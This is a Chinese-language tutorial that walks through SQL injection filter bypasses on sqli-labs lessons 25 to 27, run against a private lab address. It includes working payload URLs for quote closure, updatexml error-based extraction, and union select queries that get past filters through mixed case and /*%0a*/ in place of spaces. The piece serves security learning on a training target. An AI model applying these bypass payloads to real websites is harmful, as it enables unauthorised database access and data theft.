小课堂 -- 绕过去除特殊字符的sql注入

简介: 小课堂 -- 绕过去除特殊字符的sql注入

环境sqli-labs

 

less 25

1、输入特殊字符,报错

 

http://192.168.1.121/sqli/Less-25/?id=1\

image.png

 

2、单引号闭合

image.png

 

3、输入and、or都会被过滤,报错,输入||正常,所以可以判断是大小写过滤

http://192.168.1.121/sqli/Less-25/?id=1' and 1=1 --+

http://192.168.1.121/sqli/Less-25/?id=1' or 1=1 --+

image.png

 

http://192.168.1.121/sqli/Less-25/?id=1' || 1=1 --+

  image.png

 

less 26

 

一、输入特殊字符,看报错信息

http://192.168.1.121/sqli/Less-26/?id=1'

image.png

二、闭合语句没有效果,屏蔽了-,空格,or等等

http://192.168.1.121/sqli/Less-26/?id=1' --+

 

三、重新构造闭合语句

http://192.168.1.121/sqli/Less-26/?id=1' ||'a'='a

image.png

这样就绕过了去空格

 

四、获取数据库名称

http://192.168.1.121/sqli/Less-26/?id=1'||updatexml(1,concat('$',(database())),0)||'1'='1

image.png

 

 

less 27

一、输入特殊字符,报错

http://192.168.1.121/sqli/Less-27/?id=1'

image.png

 

二、由于过滤了特殊符号,构造如下闭合语句

http://192.168.1.121/sqli/Less-27/?id=1' ||'1

image.png

 

三、通过union查询

http://192.168.1.121/sqli/Less-27/?id=1' union select 1,2,3 ||'1

image.png

union、select屏蔽了,空格也屏蔽了

 

四、union.select大小写替换一下,空格用/*%0a*/替换

http://192.168.1.121/sqli/Less-27/?id=0'/*%0a*/uniOn/*%0a*/seLect/*%0a*/1,2,3%20||'1

image.png

 

五、获取数据库名称

http://192.168.1.121/sqli/Less-27/?id=0'/*%0a*/uniOn/*%0a*/seLect/*%0a*/1,database(),3||'1

image.png

 

 

禁止非法,后果自负

 

 

更多推荐小课堂--sql注入绕过技术

目录
相关文章
|
1月前
|
SQL 监控 安全
SQL注入的实现原理以及防止
SQL注入的实现原理以及防止
|
1月前
|
SQL Java 应用服务中间件
Java项目防止SQL注入的四种方案
Java项目防止SQL注入的四种方案
41 0
|
9天前
|
SQL 安全 Go
如何在 Python 中进行 Web 应用程序的安全性管理,例如防止 SQL 注入?
在Python Web开发中,确保应用安全至关重要,主要防范SQL注入、XSS和CSRF攻击。措施包括:使用参数化查询或ORM防止SQL注入;过滤与转义用户输入抵御XSS;添加CSRF令牌抵挡CSRF;启用HTTPS保障数据传输安全;实现强身份验证和授权系统;智能处理错误信息;定期更新及审计以修复漏洞;严格输入验证;并培训开发者提升安全意识。持续关注和改进是保证安全的关键。
17 0
|
17天前
|
SQL 安全 PHP
CTF--Web安全--SQL注入之Post-Union注入
CTF--Web安全--SQL注入之Post-Union注入
|
26天前
|
SQL Java 数据库连接
Cause: java.sql.SQLSyntaxErrorException: ORA-00911: 无效字符
Cause: java.sql.SQLSyntaxErrorException: ORA-00911: 无效字符
12 0
|
1月前
|
SQL 安全 测试技术
如何在 Python 中进行 Web 应用程序的安全性管理,例如防止 SQL 注入?
如何在 Python 中进行 Web 应用程序的安全性管理,例如防止 SQL 注入?
15 0
|
1月前
|
SQL 安全 API
|
2月前
|
SQL JSON 数据库
常见的sql注入类型闭合及符号
常见的sql注入类型闭合及符号
31 0
|
2月前
|
SQL 数据库 数据安全/隐私保护
sql注入碰到加密数据怎么办
sql注入碰到加密数据怎么办
19 1
|
2月前
|
SQL 数据库
SQL注入基础(报错注入及延时注入)
SQL注入基础(报错注入及延时注入)
22 0